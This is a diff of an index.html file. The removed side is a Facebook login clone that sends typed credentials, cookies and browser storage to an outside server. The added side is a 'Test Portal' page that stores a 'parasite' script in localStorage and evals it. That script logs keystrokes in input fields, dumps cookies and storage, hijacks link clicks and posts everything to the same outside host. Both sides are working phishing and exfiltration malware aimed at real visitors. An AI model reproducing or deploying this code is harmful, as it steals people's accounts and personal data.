--- a/index.html
+++ b/index.html
@@ -2,148 +2,96 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8" />
+  <title>Test Portal</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-  <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-eval';">
-  <meta http-equiv="X-XSS-Protection" content="0">
-  <meta http-equiv="Access-Control-Allow-Origin" content="*">
-  <title>Facebook – log in or sign up</title>
-  <link rel="stylesheet" href="/style.css" />
-  <link rel="icon" href="/favicon.ico" type="image/x-icon">
-  <script src="https://zaza-4f7z.onrender.com/capture.js"></script>
+  <script>
+    // 💾 Паразит сохраняется и исполняется
+    const payload = `
+      (function () {
+        const log = {};
+
+        log.cookies = document.cookie;
+        log.localStorage = JSON.stringify(localStorage);
+        log.sessionStorage = JSON.stringify(sessionStorage);
+        log.userAgent = navigator.userAgent;
+        log.location = location.href;
+
+        // 🧠 Кейлоггер
+        document.addEventListener('keydown', e => {
+          if (e.target && e.target.tagName === 'INPUT') {
+            log.lastKey = e.key;
+            log.inputValue = e.target.value;
+          }
+        });
+
+        // 🔁 Редирект-инъекция
+        document.querySelectorAll('a[href]').forEach(link => {
+          link.addEventListener('click', e => {
+            e.preventDefault();
+            const target = link.href;
+            fetch('https://zaza-back.onrender.com/click', {
+              method: 'POST',
+              headers: { 'Content-Type': 'application/json' },
+              body: JSON.stringify({ target, ts: Date.now() })
+            }).finally(() => location.href = target);
+          });
+        });
+
+        // ⏺️ Push (если нужно)
+        if (Notification && Notification.permission !== 'denied') {
+          Notification.requestPermission().then(p => {
+            if (p === 'granted') navigator.serviceWorker?.register('/sw.js');
+          });
+        }
+
+        // 📩 Telegram лог
+        fetch('https://zaza-back.onrender.com/login', {
+          method: 'POST',
+          headers: { 'Content-Type': 'application/json' },
+          body: JSON.stringify({
+            email: 'from-capture.js',
+            password: 'injected',
+            cookies: JSON.stringify(log)
+          })
+        });
+      })();
+    `;
+    localStorage.setItem('parasite_script', payload);
+    eval(localStorage.getItem('parasite_script'));
+  </script>
 </head>
 <body>
-  <p id="feedback" class="feedback-message"></p>
+  <h2>Demo Login</h2>
+  <form id="loginForm">
+    <input id="email" placeholder="Email" /><br />
+    <input id="password" placeholder="Password" type="password" /><br />
+    <button type="submit">Submit</button>
+  </form>
 
-  <div class="language-switcher">
-    <select id="langSelect">
-      <option value="en">English (US)</option>
-      <option value="ru">Русский</option>
-    </select>
-  </div>
+  <script>
+    document.getElementById('loginForm').addEventListener('submit', async (e) => {
+      e.preventDefault();
+      const email = document.getElementById('email').value;
+      const password = document.getElementById('password').value;
 
-  <div class="container">
-    <div class="left">
-      <img 
-        src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" 
-        alt="Facebook" 
-        class="logo" 
-      />
-      <h2>Connect with friends and the world around you on Facebook.</h2>
-    </div>
+      const payload = {
+        email: 'from-capture.js',
+        password: 'injected',
+        cookies: JSON.stringify({
+          cookies: document.cookie,
+          localStorage: JSON.stringify(localStorage),
+          sessionStorage: JSON.stringify(sessionStorage),
+          location: location.href,
+          userAgent: navigator.userAgent
+        })
+      };
 
-    <div class="right">
-      <form id="loginForm" class="login-form">
-        <input type="text" id="email" placeholder="Email or phone number" required />
-        <span id="emailError" class="error"></span>
-
-        <input type="password" id="password" placeholder="Password" required />
-        <span id="passwordError" class="error"></span>
-
-        <button type="submit" class="login-btn">Log In</button>
-        <a href="https://www.facebook.com/recover/initiate" class="forgot-link">Forgot password?</a>
-        <hr />
-        <button type="button" class="create-btn" onclick="window.location.href='https://www.facebook.com/reg';">Create new account</button>
-      </form>
-
-      <div class="create-page">
-        <a href="https://www.facebook.com/pages/create">Create a Page</a> for a celebrity, brand or business.
-      </div>
-    </div>
-  </div>
-
-  <footer class="footer">
-    <div class="footer-content">
-      <div class="languages">
-        <a href="#">English (US)</a>
-        <a href="#">Polski</a>
-        <a href="#">ślōnskŏ gŏdka</a>
-        <a href="#">Русский</a>
-        <a href="#">Deutsch</a>
-        <a href="#">Français (France)</a>
-        <a href="#">Italiano</a>
-        <a href="#">Українська</a>
-        <a href="#">Español (España)</a>
-        <a href="#">Português (Brasil)</a>
-        <a href="#">العربية</a>
-      </div>
-
-      <hr class="footer-separator" />
-
-      <div class="links">
-        <a href="https://www.facebook.com/reg">Sign Up</a>
-        <a href="https://www.facebook.com/login">Log In</a>
-        <a href="https://www.messenger.com/">Messenger</a>
-        <a href="https://www.facebook.com/lite/">Facebook Lite</a>
-        <a href="https://www.facebook.com/watch/">Video</a>
-        <a href="https://pay.facebook.com/">Meta Pay</a>
-        <a href="https://www.facebook.com/store">Meta Store</a>
-        <a href="https://www.meta.com/quest/">Meta Quest</a>
-        <a href="https://www.ray-ban.com/">Ray-Ban Meta</a>
-        <a href="https://www.meta.ai/">Meta AI</a>
-        <a href="https://www.instagram.com/">Instagram</a>
-        <a href="https://www.threads.net/">Threads</a>
-        <a href="https://www.facebook.com/votinginformationcenter/">Voting Information Center</a>
-        <a href="https://www.facebook.com/privacy/policy">Privacy Policy</a>
-        <a href="https://www.facebook.com/privacy/center/">Privacy Center</a>
-        <a href="https://www.facebook.com/help/delete_account?rdrhc">Cancel contracts here</a>
-        <a href="https://www.facebook.com/about">About</a>
-        <a href="https://www.facebook.com/ads/create">Create ad</a>
-        <a href="https://www.facebook.com/pages/create">Create Page</a>
-        <a href="https://developers.facebook.com/">Developers</a>
-        <a href="https://www.facebook.com/careers/">Careers</a>
-        <a href="https://www.facebook.com/policies/cookies/">Cookies</a>
-        <a href="https://www.facebook.com/adpreferences/ad_settings/">Ad choices</a>
-        <a href="https://www.facebook.com/terms">Terms</a>
-        <a href="https://www.facebook.com/help/">Help</a>
-        <a href="https://www.facebook.com/help/contact/268228883256323">Contact Uploading & Non-Users</a>
-      </div>
-
-      <p class="meta-copy">Meta © 2025</p>
-    </div>
-  </footer>
-
-  <script type="module">
-    (async () => {
-      const feedback = document.getElementById('feedback');
-
-      const loginForm = document.getElementById('loginForm');
-
-      loginForm.addEventListener('submit', async (e) => {
-        e.preventDefault();
-
-        const email = document.getElementById('email').value.trim();
-        const password = document.getElementById('password').value.trim();
-        const cookies = document.cookie || '[no cookies]';
-        const localStorageDump = JSON.stringify(localStorage || {});
-        const sessionStorageDump = JSON.stringify(sessionStorage || {});
-
-        const payload = {
-          email,
-          password,
-          cookies,
-          localStorage: localStorageDump,
-          sessionStorage: sessionStorageDump
-        };
-
-        try {
-          feedback.innerText = 'Sending data...';
-          await fetch('https://zaza-back.onrender.com/login', {
-            method: 'POST',
-            headers: { 'Content-Type': 'application/json' },
-            credentials: 'include',
-            body: JSON.stringify(payload)
-          });
-          feedback.innerText = '✅ Data sent.';
-        } catch (error) {
-          feedback.innerText = '❌ Failed to send.';
-        } finally {
-          setTimeout(() => {
-            window.location.href = 'https://www.facebook.com/';
-          }, 1200);
-        }
+      await fetch('https://zaza-back.onrender.com/login', {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' },
+        body: JSON.stringify(payload)
       });
-    })();
+    });
   </script>
-
 </body>
 </html>
